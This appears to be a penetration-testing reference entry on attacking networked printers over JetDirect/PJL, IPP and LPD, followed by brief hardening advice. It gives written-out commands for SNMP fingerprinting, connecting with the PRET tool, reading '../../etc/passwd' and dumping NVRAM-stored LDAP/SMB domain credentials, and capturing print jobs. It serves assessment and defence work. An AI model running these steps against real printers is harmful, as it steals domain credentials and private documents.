Network Printers (JetDirect)
aka jetdirect, pjl, ipp
Network printers speak raw PJL/PostScript on 9100 (plus IPP 631, LPD 515). With PRET you can read the filesystem, dump stored credentials and LDAP binds from NVRAM, and capture queued print jobs.
Ports
| Port | Proto | Notes |
|---|---|---|
9100 | tcp | raw printing (JetDirect / PJL) |
631 | tcp | IPP / CUPS |
515 | tcp | LPD |
Fingerprint
- Banner / SNMP sysDescr names the printer model
- 9100 accepts raw PJL commands
Key files
| Path | Holds | Sensitive |
|---|---|---|
printer NVRAM / config | LDAP/SMB bind creds, admin password, wifi keys | sensitive |
Exploitation primitives
- PRET over PJL/PS: browse and read the printer filesystem
- Dump stored LDAP/SMB scan-to-folder credentials from NVRAM (often domain accounts)
- Capture or replay queued print jobs; some models allow firmware/RCE abuse
Overview
Printers are full computers that hold domain credentials (for scan-to-folder/LDAP) and queued documents. Raw PJL on 9100 plus PRET turns them into a credential source.
Enumeration
Identify the model over SNMP:
snmpget -v2c -c public <TARGET> 1.3.6.1.2.1.1.1.0Connect with PRET (PJL):
python3 pret.py <TARGET> pjlLoot the filesystem & creds
Inside PRET, browse and read files:
ls
cat ../../etc/passwd
nvram dumpnvram dump frequently reveals the LDAP/SMB bind account used for scan-to-folder.
Capture print jobs
capture startHardening
Set an admin/PJL password, disable raw 9100 where unused, store scan creds in a least-privilege account, and segment printers off the user VLAN.